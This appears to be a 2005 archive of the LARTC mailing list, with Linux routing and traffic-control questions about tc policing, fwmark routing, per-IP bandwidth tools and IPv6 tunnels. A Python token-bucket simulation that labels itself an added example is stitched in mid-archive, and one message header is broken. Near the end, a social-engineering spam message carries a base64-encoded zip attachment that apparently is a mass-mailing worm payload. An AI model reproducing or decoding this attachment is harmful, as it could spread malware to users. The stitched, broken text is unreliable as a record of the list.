techsupport@sqliaison.com


From m@tthias.net Thu Feb 3 12:02:45 2005
From: m@tthias.net (Matthias Wimmer)
Date: Thu, 3 Feb 2005 13:02:45 +0100
Subject: [LARTC] TOS for IPv6 traffic in a tunnel
Message-ID: <20050203120245.GA6126@false>

Hi!

I searched the internet but did not find any results yet. Maybe here is someone that might help me.

Is it possible to use the traffic class of an IPv6 packet to set the TOS value of a wrapping IPv4 packet, that will transport the IPv6 packet through a tunnel?

I am asking this because I want to extend the traffic classes I am using on my DSL link to also classify IPv6 packets correctly that are routed through a tunnel over this DSL link.

Another question: Is it possible that ssh/scp set the traffic class of IPv6 packets? The class seems to be 0x00 for both applications while with IPv4 connections I see different ToS values for both.

Thank you!

Matthias
--
Fon: +49-(0)70 0770 07770 http://web.amessage.info
Fax: +49-(0)89 312 88 654 xmpp:mawis@amessage.info

From igogu@umsoft.ro Thu Feb 3 13:08:56 2005
From: igogu@umsoft.ro (Ionut Gogu)
Date: Thu, 3 Feb 2005 15:08:56 +0200
Subject: [LARTC] bandwidth for each individual IP
Message-ID: <001d01c509f1$84797d90$340aa8c0@unix>

Hello!
I'm using a Slackware Linux as a router and 50 IP addresses for my LAN Clients.
Is there any program I can install that will be able to tell me:

how much (i.e. kbps) each individual IP is using at moment t?

From nik@varna.net Thu Feb 3 14:01:51 2005
From: nik@varna.net (Nikolay Datchev)
Date: Thu, 3 Feb 2005 16:01:51 +0200 (EET)
Subject: [LARTC] bandwidth for each individual IP
In-Reply-To: <001d01c509f1$84797d90$340aa8c0@unix>
References: <001d01c509f1$84797d90$340aa8c0@unix>
Message-ID:

http://www.ex-parrot.com/~pdw/iftop/

--
Nikolay Datchev

On Thu, 3 Feb 2005, Ionut Gogu wrote:
> Hello!
> I'm using a Slackware Linux as a router and 50 IP addresses for my LAN Clients.
> Is there any program i can install that will be able to tell me:
>
> how much (ie. kbps) each individual IP is using at moment t?
>

From stef.coene@docum.org Thu Feb 3 14:48:19 2005
From: stef.coene@docum.org (Stef Coene)
Date: Thu, 3 Feb 2005 15:48:19 +0100
Subject: [LARTC] What does flowid:1 mean here?
In-Reply-To: <20050203061157.53279.qmail@web15504.mail.cnb.yahoo.com>
References: <20050203061157.53279.qmail@web15504.mail.cnb.yahoo.com>
Message-ID: <200502031548.19142.stef.coene@docum.org>

On Thursday 03 February 2005 07:11, CcM wrote:
> Hi,
> I got the following lines from 'Linux Advanced Routing & Traffic
> Control HOWTO' and got confused!
>
> iptables -A PREROUTING -i $INDEV -t mangle -p tcp --syn \
>   -j MARK --set-mark 1
> tc qdisc add dev $INDEV handle ffff: ingress
> tc filter add dev $INDEV parent ffff: protocol ip prio 50 handle 1 fw \
>   police rate 1kbit burst 40 mtu 9k drop flowid :1
>
> Does the second command mean that the filter will police the traffic
> of syn to 1kbit by dropping? What does flowid:1 mean here?

It means that all traffic that's under 1kbit will be sent to class :1 (or long notation: ffff:1). All traffic above 1kbit will be dropped.

Stef

From crashev@eweb-pro.com Thu Feb 3 15:33:06 2005
From: crashev@eweb-pro.com (Paweł)
Date: Thu, 3 Feb 2005 16:33:06 +0100
Subject: [LARTC] bandwidth for each individual IP
In-Reply-To: <001d01c509f1$84797d90$340aa8c0@unix>
References: <001d01c509f1$84797d90$340aa8c0@unix>
Message-ID: <200502031633.07867.crashev@eweb-pro.com>

On Thursday 03 February 2005 14:08, Ionut Gogu wrote:
> Hello!
> I'm using a Slackware Linux as a router and 50 IP addresses for my LAN
> Clients. Is there any program i can install that will be able to tell me:
>
> how much (ie. kbps) each individual IP is using at moment t?

Try jnettop.

From saz"

Hi guys I'm trying to make a port redirection using iproute together with iptables mangle option .. but for some strange reason is not working yet, I know I can do it in a different way, but the idea is using packet marking and redirect the packets with a rule.

I have two computers PC1 and PC2

PC1: 192.168.0.1 this is the one connected to internet, and this machine make the redirection
PC2: 192.168.0.2 this is the smtp server

So this is what I do in PC1:

first I mark all the packets incoming for 25 port with "1":

iptables -t mangle -A PREROUTING -p tcp --dport 25 -j MARK --set-mark 1

then I create a table called smtp:

echo 200 smtp >> /etc/iproute2/rt_tables

after that I set PC2 as default via for my smtp table:

ip route add default via 192.168.0.2 table smtp

and finally I make the rule for smtp table

ip rule add fwmark 1 table smtp

this would have to work, but is not redirecting nothing...

I can see that is making the packets with 1 using the command iptables -t mangle -L PREROUTING -v but is not working, any one can help me?
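
Stef Coene's reply above ("What does flowid:1 mean here?") describes the ingress policer as a pass-or-drop decision at 1kbit. The following is an added example, not code from the thread or from the HOWTO: a simplified single token-bucket model (not the kernel's implementation) of "police rate 1kbit burst 40 ... drop flowid :1", run over constructed SYN arrival times. The 40- and 60-byte SYN sizes, the arrival patterns and all names in the code are assumptions.

```python
"""Simplified model (added example) of the ingress policer quoted in the thread:
    police rate 1kbit burst 40 mtu 9k drop flowid :1
One token bucket in integer arithmetic; this is not the kernel's code."""

US_PER_SEC = 1_000_000
RATE_BITS_PER_SEC = 1000   # "rate 1kbit": tc's kbit means 1000 bit/s
BURST_BYTES = 40           # "burst 40": bucket depth in bytes
CONFORM = "flowid :1"      # conforming packets are classified to ffff:1
EXCEED = "drop"            # the policer's exceed action


class Policer:
    def __init__(self, rate_bps=RATE_BITS_PER_SEC, burst_bytes=BURST_BYTES):
        self.rate_bps = rate_bps
        # Tokens are counted in bit-microseconds so no floats are needed.
        self.capacity = burst_bytes * 8 * US_PER_SEC
        self.tokens = self.capacity   # bucket starts full
        self.last_us = 0

    def offer(self, now_us, size_bytes):
        """Return CONFORM or EXCEED for one packet arriving at now_us."""
        elapsed = now_us - self.last_us
        self.last_us = now_us
        # Refill for the elapsed time, never above the bucket depth.
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate_bps)
        cost = size_bytes * 8 * US_PER_SEC
        if cost <= self.tokens:
            self.tokens -= cost
            return CONFORM
        return EXCEED


def simulate(arrivals_us, size_bytes):
    """Feed marked SYNs to a fresh policer; return (passed, dropped)."""
    policer = Policer()
    verdicts = [policer.offer(t, size_bytes) for t in arrivals_us]
    passed = verdicts.count(CONFORM)
    return passed, len(verdicts) - passed


def run_constructed_scenarios():
    """Constructed arrival patterns; packet sizes are assumptions."""
    slow = [i * 500_000 for i in range(10)]    # 2 SYN/s for 5 s
    flood = [i * 10_000 for i in range(200)]   # 100 SYN/s for 2 s
    return {
        "slow_client_40B": simulate(slow, 40),   # bare IPv4+TCP SYN
        "flood_40B": simulate(flood, 40),
        "slow_client_60B": simulate(slow, 60),   # SYN carrying TCP options
    }


if __name__ == "__main__":
    for name, (passed, dropped) in run_constructed_scenarios().items():
        print(f"{name}: {passed} to {CONFORM}, {dropped} dropped")
```

In this model the bucket refills one 40-byte SYN every 0.32 s, so a flood is cut to roughly three SYNs per second while a slow client is untouched. A packet larger than the bucket never conforms here, so the burst has to be at least the size of the largest SYN that should be admitted.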

From mariusrugan@gmail.com Thu Feb 3 16:00:40 2005
From: mariusrugan@gmail.com (mariusrugan@gmail.com)
Date: Thu, 03 Feb 2005 18:00:40 +0200
Subject: [LARTC] bandwidth for each individual IP
In-Reply-To: <001d01c509f1$84797d90$340aa8c0@unix>
References: <001d01c509f1$84797d90$340aa8c0@unix>
Message-ID: <42024AA8.7010203@gmail.com>

Ionut Gogu wrote:
> Hello!
> I'm using a Slackware Linux as a router and 50 IP addresses for my
> LAN Clients.
> Is there any program i can install that will be able to tell me:
>
> how much (ie. kbps) each individual IP is using at moment t?

salut, :)
u can use tcptrack, supports libcap expressions, as I am sure iftop does too, as I see based on libcap, never tested it alltho' ... but preparing for ... :)

tcptrack is a robust application, responds very quickly to kernel load from network traffic, myself using it for network monitoring and audit for more than 62 workstations, libcap expressions & filtering are less complicated than tcpdump based ones, other words looks good, works good.

http://www.rhythm.cx/~steve/devel/tcptrack/

From raycharles_man@yahoo.com Thu Feb 3 22:08:15 2005
From: raycharles_man@yahoo.com (Ray Charles)
Date: Thu, 3 Feb 2005 14:08:15 -0800 (PST)
Subject: [LARTC] best patch for iptables ratelimiting
Message-ID: <20050203220816.70207.qmail@web61208.mail.yahoo.com>

According to the F.A.Q. there's a patch to do ratelimiting:
http://etudiant.univ-mlv.fr/~jpetazzo/bytelimit.tgz

Going with the thought that this is current, I tried it. I wasn't able to get it to compile, as support for invert was causing a failure (I think). But I was able to get it to compile when I changed line 73 and my box loaded the module.

Anyone know if this will do ratelimit based on sessions? or based on bandwidth? I am partial to doing ratelimit based on sessions.

Thanks-
Ray

From shemminger@osdl.org Fri Feb 4 00:22:40 2005
From: shemminger@osdl.org (Stephen Hemminger)
Date: Thu, 3 Feb 2005 16:22:40 -0800
Subject: [LARTC] Issue with using using tc api
In-Reply-To: <20050203034340.76AE2416118@ws5-2.us4.outblaze.com>
References: <20050203034340.76AE2416118@ws5-2.us4.outblaze.com>
Message-ID: <20050203162240.45c273e4@dxpl.pdx.osdl.net>

On Thu, 03 Feb 2005 11:43:40 +0800 "sanjeev ravindran" wrote:
> Thank you so much for ur response Stephen,
>
> Ya, I found that dlopen tries to load q_htb.so.. and it fails..
> I tried to locate q_htb.so in my rh9 machine.. but i couldn't locate it..
> Could you let me know how build q_htb.so standalone ??
> Thanks in advance,
> With best regards,
> Sanjeev Ravindran

Something like:

gcc -D_GNU_SOURCE -O2 -Wstrict-prototypes -Wall -g -I../include \
    -DRESOLVE_HOSTNAMES -DCONFIG_GACT -DCONFIG_GACT_PROB -shared -fpic q_htb.c -o q_htb.so

The tc/Makefile shows how it is done for q_netem.so

From 3ds@norwesters.net Fri Feb 4 09:20:03 2005
From: 3ds@norwesters.net (3ds@norwesters.net)
Date: Fri, 4 Feb 2005 01:20:03 -0800
Subject: [LARTC] routable subnet as aliased IP's?
Message-ID: <1107508803.42033e435a792@mail.norwesters.org>

Greetings all!

I just got a colocated server space and the ISP has given me an IP address and a routable /29 subnet.

Here's a partial snippet of the info they gave me (with the real addresses changed for privacy)

==== WAN Address
Customer IP Address : 100.0.33.14
Netmask             : 255.255.255.248
Broadcast Address   : 100.0.33.15
Default Gateway     : 100.0.33.9

==== Routed Network
IP Address Type       : 100.0.43.152/29 Class-C Subnet
Number of IP Addrs    : 6
Domain Name           : example.net
Customer IP Addresses : 100.0.43.{153 thru 158}
Netmask               : 255.255.255.248
Broadcast Address     : 100.0.43.159

And they provided this chart:

                                                -
                                                |
                                                |      +----------+
                                                |      | Customer |
                                                |------| Host #1  |
                                                | .154 |          |
                                                |      +----------+
           - WAN -                  - Subnet -  |
+------+   Net/Mask   +----------+   Net/Mask   |      +----------+
| ISP  |  100.0.33.8  | Customer | 100.0.43.152 |      | Customer |
|Router|---- /29 -----|Colocation|---- /248 ----|------| Host #2  |
|      | .9       .14 |  Router  | .153         | .155 |          |
+------+              +----------+              |      +----------+
                     ** REQUIRED **             |
                      ** DEVICE **              |      +----------+
                                                |      | Customer |
                                                |------| Host #n  |
                                                | .156 |          |
                                                |      +----------+
                                                |
                                                -

I have a single server with Fedora Core3 (x86-64 2.6.10-1 kernel) installed, and my intent is to use the iproute2 tools to set up aliases for .154, .155, .156, etc. and then use IP Virtual Hosts in Apache.

So, to my question. I could get a router for routing the /29 subnet as the ISP suggests, but can I use my Linux machine to do this? Can I mount eth0 as 100.0.33.14 and then setup the 100.0.43.152-158 as aliases and write the routing so that everything works?

I have read chapters 3 and 4 of the LARTC, and I think it may be possible, but it's just not clicking yet as to how I might be able to do this.

And to add one last twist to this... let's say that I can do the above, what if I wanted to take one of those IP's from the /29 subnet and route it on to another system plugged into my eth1 while maintaining all of the other IP's as aliases?

Am I dreaming? Can you help me?

Thanks!
Ray

From steve@4Dllc.com Fri Feb 4 09:26:28 2005
From: steve@4Dllc.com (Steve Comfort)
Date: Fri, 04 Feb 2005 11:26:28 +0200
Subject: [LARTC] Patches
References:
Message-ID: <42033FC4.2090200@4Dllc.com>

Hi All,

I'm trying to cross-compile tc for an IXP ARM processor, using kernel 2.4.19. The compilation fails due to not finding struct tc_dly_qopt in include/linux/tc_sched.h

Can anyone point me at a patch that will resolve this?

Best regards
Steve Comfort

From sanjeev_ravindran@linuxmail.org Fri Feb 4 12:02:29 2005
From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran)
Date: Fri, 04 Feb 2005 20:02:29 +0800
Subject: [LARTC] Unable to delete htb class
Message-ID: <20050204120229.02F7E21AFF9@ws5-6.us4.outblaze.com>

Hi,
I'm trying to delete an htb class using tc... but I get the following error

RTNETLINK ANSWERS: Device or resource busy

What could be the problem?
I had attached a tbf to it and removed it prior to removing the class.. I tried to delete the class without deleting the qdisc also.. both cases it fails..
Any help regarding this will be most appreciated..
Thanks in advance,
Sanjeev R

From kleptog@cupid.suninternet.com Fri Feb 4 12:39:07 2005
From: kleptog@cupid.suninternet.com (kleptog@cupid.suninternet.com)
Date: Fri, 4 Feb 2005 14:39:07 +0200
Subject: [LARTC] Fwd: Warning again
Message-ID: <20050204124718.B7AA140A9@outpost.ds9a.nl>

Do not visit this illegal websites!

Content-Type: application/octet-stream; name="websites01.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="websites01.zip"
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 